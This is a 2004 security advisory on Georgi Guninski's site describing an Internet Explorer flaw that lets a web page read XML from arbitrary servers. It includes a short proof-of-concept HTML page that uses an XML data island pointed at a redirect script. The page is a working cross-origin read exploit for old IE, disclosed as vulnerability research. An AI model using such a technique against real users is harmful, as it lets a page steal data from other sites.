Yet another IE aperture

cyrillic logo
Home
Security
Internet Explorer
Windows 2000
AIX
Netscape
Misc
Other
Links
Services
In the news
Random stuff
Contact
guninski@guninski.com

Georgi Guninski security advisory #71, 2004

Yet another IE aperture

Systems affected:
tested on patched IE on win2k and xp

Date: 7 October 2004
Update: 9 October 2004

Greymagic have disclosed the same bug in 2002 - http://www.greymagic.com/security/advisories/gm009-ie/

The bug is still functional - check here or here

Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You  may  not  modify    it   and   distribute    it   or   distribute   parts of it without the author's written permission - this especially  applies  to so called "vulnerabilities databases"  and  securityfocus,  microsoft,    cert and mitre.
If   you   want    to     link     to    this    content      use     the    URL:
http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html
Anything in this document may change without notice.

Disclaimer:
The  information  in  this  advisory  is  believed   to   be   true   though
it may be false.
The opinions  expressed  in  this  advisory  and  program  are    my  own  and not   of   any     company.    The   usual   standard   disclaimer    applies, especially the fact that Georgi Guninski  is  not  liable  for    any  damages caused by direct  or  indirect    use  of  the  information  or  functionality provided  by  this  advisory  or  program.    Georgi   Guninski   bears   no responsibility for  content  or  misuse  of  this  advisory  or  program  or any derivatives thereof.

Description:

By opening html in IE it is possible to read at least well formed xml from arbitrary servers. The info then may be transmitted.

Details:

Consider this:

---------
<html>
    <script>
        function f()
        {
            alert(document.all.x1.XMLDocument.xml);
        }
    </script>

    <body onload="f()">
        <script id="x1" language="xml" src="/cgi-bin/redir.pl"></script>
        <h1>
            Copyright Georgi Guninski <br />
            Cannot be used in any database
        </h1>
    </body>
</html>

---------

redir.pl does a http redirect.


Georgi Guninski
http://www.guninski.com


 
 

| Home | Internet Explorer | Windows 2000 | AIX | Netscape | Links | More... |